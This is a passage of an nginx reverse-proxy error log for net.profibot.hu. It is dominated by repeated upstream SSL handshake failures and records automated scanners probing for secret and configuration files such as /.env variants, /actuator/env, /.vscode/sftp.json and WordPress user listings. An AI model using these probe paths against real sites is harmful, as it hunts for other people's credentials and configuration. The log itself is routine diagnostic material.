while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /config.json HTTP/1.1", upstream: "https://172.18.0.2:81/config.json", host: "net.profibot.hu" +2026/01/31 10:05:50 [warn] 293#293: *18334 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /telescope/requests HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:50 [warn] 295#295: *18335 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /info.php HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:51 [warn] 295#295: *18336 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /.well-known/security.txt HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:52 [error] 293#293: *18337 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /telescope/requests HTTP/1.1", upstream: "https://172.18.0.2:81/telescope/requests", host: "net.profibot.hu" +2026/01/31 10:05:52 [warn] 295#295: *18340 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /actuator/env HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:52 [error] 295#295: *18341 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /info.php HTTP/1.1", upstream: "https://172.18.0.2:81/info.php", host: "net.profibot.hu" +2026/01/31 10:05:53 [error] 295#295: *18347 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /.well-known/security.txt HTTP/1.1", upstream: "https://172.18.0.2:81/.well-known/security.txt", host: "net.profibot.hu" +2026/01/31 10:05:54 [warn] 295#295: *18350 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /swagger-ui.html HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:54 [error] 295#295: *18351 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /actuator/env HTTP/1.1", upstream: "https://172.18.0.2:81/actuator/env", host: "net.profibot.hu" +2026/01/31 10:05:55 [warn] 295#295: *18354 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /swagger/index.html HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:56 [warn] 295#295: *18355 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /swagger/swagger-ui.html HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:56 [error] 295#295: *18356 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /swagger-ui.html HTTP/1.1", upstream: "https://172.18.0.2:81/swagger-ui.html", host: "net.profibot.hu" +2026/01/31 10:05:57 [warn] 295#295: *18359 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:57 [error] 295#295: *18360 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /swagger/index.html HTTP/1.1", upstream: "https://172.18.0.2:81/swagger/index.html", host: "net.profibot.hu" +2026/01/31 10:05:58 [warn] 295#295: *18363 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /swagger.json HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:58 [error] 295#295: *18364 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /swagger/swagger-ui.html HTTP/1.1", upstream: "https://172.18.0.2:81/swagger/swagger-ui.html", host: "net.profibot.hu" +2026/01/31 10:05:59 [warn] 295#295: *18367 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /swagger/v1/swagger.json HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:05:59 [error] 295#295: *18368 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", upstream: "https://172.18.0.2:81/webjars/swagger-ui/index.html", host: "net.profibot.hu" +2026/01/31 10:06:00 [warn] 295#295: *18371 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /v2/api-docs HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:06:00 [error] 295#295: *18372 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /swagger.json HTTP/1.1", upstream: "https://172.18.0.2:81/swagger.json", host: "net.profibot.hu" +2026/01/31 10:06:01 [warn] 295#295: *18375 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /v3/api-docs HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:06:01 [error] 295#295: *18376 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /swagger/v1/swagger.json HTTP/1.1", upstream: "https://172.18.0.2:81/swagger/v1/swagger.json", host: "net.profibot.hu" +2026/01/31 10:06:02 [warn] 295#295: *18379 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /api-docs/swagger.json HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:06:02 [error] 295#295: *18381 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /v2/api-docs HTTP/1.1", upstream: "https://172.18.0.2:81/v2/api-docs", host: "net.profibot.hu" +2026/01/31 10:06:03 [error] 295#295: *18380 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.164.216.85, server: net.profibot.hu, request: "HEAD / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:06:03 [warn] 295#295: *18386 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /api/swagger.json HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:06:03 [error] 295#295: *18387 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /v3/api-docs HTTP/1.1", upstream: "https://172.18.0.2:81/v3/api-docs", host: "net.profibot.hu" +2026/01/31 10:06:04 [warn] 295#295: *18390 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /@vite/env HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:06:04 [error] 295#295: *18391 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /api-docs/swagger.json HTTP/1.1", upstream: "https://172.18.0.2:81/api-docs/swagger.json", host: "net.profibot.hu" +2026/01/31 10:06:05 [warn] 296#296: *18394 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /.vscode/sftp.json HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:06:05 [error] 295#295: *18395 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /api/swagger.json HTTP/1.1", upstream: "https://172.18.0.2:81/api/swagger.json", host: "net.profibot.hu" +2026/01/31 10:06:06 [warn] 296#296: *18398 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "OPTIONS / HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:06:06 [error] 295#295: *18399 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /@vite/env HTTP/1.1", upstream: "https://172.18.0.2:81/@vite/env", host: "net.profibot.hu" +2026/01/31 10:06:07 [warn] 296#296: *18402 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:06:07 [error] 295#295: *18403 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /.vscode/sftp.json HTTP/1.1", upstream: "https://172.18.0.2:81/.vscode/sftp.json", host: "net.profibot.hu" +2026/01/31 10:06:08 [warn] 296#296: *18407 using uninitialized "server" variable while logging request, client: 206.81.12.187, server: net.profibot.hu, request: "GET /debug/default/view?panel=config HTTP/1.1", host: "net.profibot.hu:443" +2026/01/31 10:06:08 [error] 295#295: *18408 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "OPTIONS / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:06:09 [error] 296#296: *18411 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", upstream: "https://172.18.0.2:81/?rest_route=/wp/v2/users/", host: "net.profibot.hu" +2026/01/31 10:06:10 [error] 296#296: *18414 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 159.89.174.87, server: net.profibot.hu, request: "GET /debug/default/view?panel=config HTTP/1.1", upstream: "https://172.18.0.2:81/debug/default/view?panel=config", host: "net.profibot.hu" +2026/01/31 10:06:14 [error] 296#296: *18419 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 173.244.33.10, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:06:14 [error] 296#296: *18419 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 173.244.33.10, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://172.18.0.2:81/favicon.ico", host: "net.profibot.hu" +2026/01/31 10:06:14 [warn] 296#296: *18424 using uninitialized "server" variable while logging request, client: 146.70.11.5, server: net.profibot.hu, request: "GET / HTTP/1.1", host: "net.profibot.hu" +2026/01/31 10:06:30 [error] 296#296: *18435 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:06:30 [error] 296#296: *18435 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://172.18.0.2:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:07:23 [error] 294#294: *18489 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env HTTP/1.1", upstream: "https://172.18.0.2:81/.env", host: "net.profibot.hu" +2026/01/31 10:07:23 [error] 294#294: *18489 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.local HTTP/1.1", upstream: "https://172.18.0.2:81/.env.local", host: "net.profibot.hu" +2026/01/31 10:07:23 [error] 294#294: *18489 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", upstream: "https://172.18.0.2:81/.env.prod", host: "net.profibot.hu" +2026/01/31 10:07:23 [error] 294#294: *18489 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", upstream: "https://172.18.0.2:81/.env.dev", host: "net.profibot.hu" +2026/01/31 10:07:32 [error] 305#305: *18511 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env HTTP/1.1", upstream: "https://172.18.0.2:81/.env", host: "net.profibot.hu" +2026/01/31 10:07:32 [error] 305#305: *18511 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.local HTTP/1.1", upstream: "https://172.18.0.2:81/.env.local", host: "net.profibot.hu" +2026/01/31 10:07:33 [error] 305#305: *18511 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", upstream: "https://172.18.0.2:81/.env.prod", host: "net.profibot.hu" +2026/01/31 10:07:33 [error] 305#305: *18511 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", upstream: "https://172.18.0.2:81/.env.dev", host: "net.profibot.hu" +2026/01/31 10:07:53 [error] 302#302: *18526 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env HTTP/1.1", upstream: "https://172.18.0.2:81/.env", host: "net.profibot.hu" +2026/01/31 10:07:53 [error] 302#302: *18526 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.local HTTP/1.1", upstream: "https://172.18.0.2:81/.env.local", host: "net.profibot.hu" +2026/01/31 10:07:53 [error] 302#302: *18526 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", upstream: "https://172.18.0.2:81/.env.prod", host: "net.profibot.hu" +2026/01/31 10:07:53 [error] 302#302: *18526 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", upstream: "https://172.18.0.2:81/.env.dev", host: "net.profibot.hu" +2026/01/31 10:08:08 [error] 302#302: *18567 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 94.176.81.49, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:08:08 [error] 302#302: *18566 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 206.204.28.42, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:08:08 [error] 302#302: *18567 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 94.176.81.49, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://172.18.0.2:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:08:08 [error] 302#302: *18566 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 206.204.28.42, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://172.18.0.2:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:08:18 [error] 302#302: *18579 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env HTTP/1.1", upstream: "https://172.18.0.2:81/.env", host: "net.profibot.hu" +2026/01/31 10:08:18 [error] 302#302: *18579 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.local HTTP/1.1", upstream: "https://172.18.0.2:81/.env.local", host: "net.profibot.hu" +2026/01/31 10:08:18 [error] 302#302: *18579 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", upstream: "https://172.18.0.2:81/.env.prod", host: "net.profibot.hu" +2026/01/31 10:08:19 [error] 302#302: *18579 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", upstream: "https://172.18.0.2:81/.env.dev", host: "net.profibot.hu" +2026/01/31 10:08:23 [error] 303#303: *18588 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 192.175.111.244, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:08:24 [error] 304#304: *18593 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 64.15.129.123, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:08:24 [error] 305#305: *18597 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 192.175.111.237, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:08:25 [error] 302#302: *18600 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 192.175.111.245, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:08:25 [error] 302#302: *18603 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 64.15.129.123, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:09:19 [error] 302#302: *18610 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:09:19 [error] 302#302: *18610 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:09:20 [error] 302#302: *18610 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /_next HTTP/1.1", upstream: "https://172.18.0.2:81/_next", host: "net.profibot.hu" +2026/01/31 10:09:20 [error] 302#302: *18610 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /__rsc HTTP/1.1", upstream: "https://172.18.0.2:81/__rsc", host: "net.profibot.hu" +2026/01/31 10:09:20 [error] 302#302: *18610 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /rsc HTTP/1.1", upstream: "https://172.18.0.2:81/rsc", host: "net.profibot.hu" +2026/01/31 10:09:22 [error] 302#302: *18621 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:09:22 [error] 302#302: *18621 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:09:22 [error] 302#302: *18621 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /_next HTTP/1.1", upstream: "https://172.18.0.2:81/_next", host: "net.profibot.hu" +2026/01/31 10:09:22 [error] 302#302: *18621 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /__rsc HTTP/1.1", upstream: "https://172.18.0.2:81/__rsc", host: "net.profibot.hu" +2026/01/31 10:09:23 [error] 302#302: *18621 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /rsc HTTP/1.1", upstream: "https://172.18.0.2:81/rsc", host: "net.profibot.hu" +2026/01/31 10:09:59 [error] 302#302: *18637 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:10:00 [error] 302#302: *18637 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:10:00 [error] 302#302: *18637 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /_next HTTP/1.1", upstream: "https://172.18.0.2:81/_next", host: "net.profibot.hu" +2026/01/31 10:10:00 [error] 302#302: *18637 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /__rsc HTTP/1.1", upstream: "https://172.18.0.2:81/__rsc", host: "net.profibot.hu" +2026/01/31 10:10:00 [error] 303#303: *18646 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 146.70.203.23, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:10:00 [error] 302#302: *18637 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /rsc HTTP/1.1", upstream: "https://172.18.0.2:81/rsc", host: "net.profibot.hu" +2026/01/31 10:10:00 [error] 303#303: *18649 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 185.94.190.205, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:10:01 [error] 303#303: *18654 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:10:01 [error] 303#303: *18654 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:10:02 [error] 303#303: *18654 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /_next HTTP/1.1", upstream: "https://172.18.0.2:81/_next", host: "net.profibot.hu" +2026/01/31 10:10:02 [error] 303#303: *18654 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /__rsc HTTP/1.1", upstream: "https://172.18.0.2:81/__rsc", host: "net.profibot.hu" +2026/01/31 10:10:02 [error] 303#303: *18654 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 176.65.148.161, server: net.profibot.hu, request: "HEAD /rsc HTTP/1.1", upstream: "https://172.18.0.2:81/rsc", host: "net.profibot.hu" +2026/01/31 10:10:03 [error] 303#303: *18655 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 147.45.116.17, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:81/", host: "net.profibot.hu" +2026/01/31 10:10:16 [error] 303#303: *18669 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env HTTP/1.1", upstream: "https://172.18.0.2:81/.env", host: "net.profibot.hu" +2026/01/31 10:10:16 [error] 303#303: *18669 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.local HTTP/1.1", upstream: "https://172.18.0.2:81/.env.local", host: "net.profibot.hu" +2026/01/31 10:10:16 [error] 303#303: *18669 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", upstream: "https://172.18.0.2:81/.env.prod", host: "net.profibot.hu" +2026/01/31 10:10:16 [error] 303#303: *18669 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 104.244.74.39, server: net.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", upstream: "https://172.18.0.2:81/.env.dev", host: "net.profibot.hu" +2026/01/31 10:11:12 [error] 312#312: *18701 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 147.45.116.17, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:80/", host: "net.profibot.hu" +2026/01/31 10:11:32 [error] 311#311: *18714 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://172.18.0.2:80/", host: "net.profibot.hu" +2026/01/31 10:11:32 [error] 311#311: *18714 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://172.18.0.2:80/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:14:08 [error] 320#320: *18750 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://192.168.100.43:81/", host: "net.profibot.hu" +2026/01/31 10:14:08 [error] 320#320: *18750 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://192.168.100.43:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:14:10 [error] 320#320: *18750 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://192.168.100.43:81/", host: "net.profibot.hu" +2026/01/31 10:14:10 [error] 320#320: *18750 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://192.168.100.43:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:14:17 [error] 320#320: *18750 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://192.168.100.43:81/", host: "net.profibot.hu" +2026/01/31 10:14:17 [error] 320#320: *18750 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version 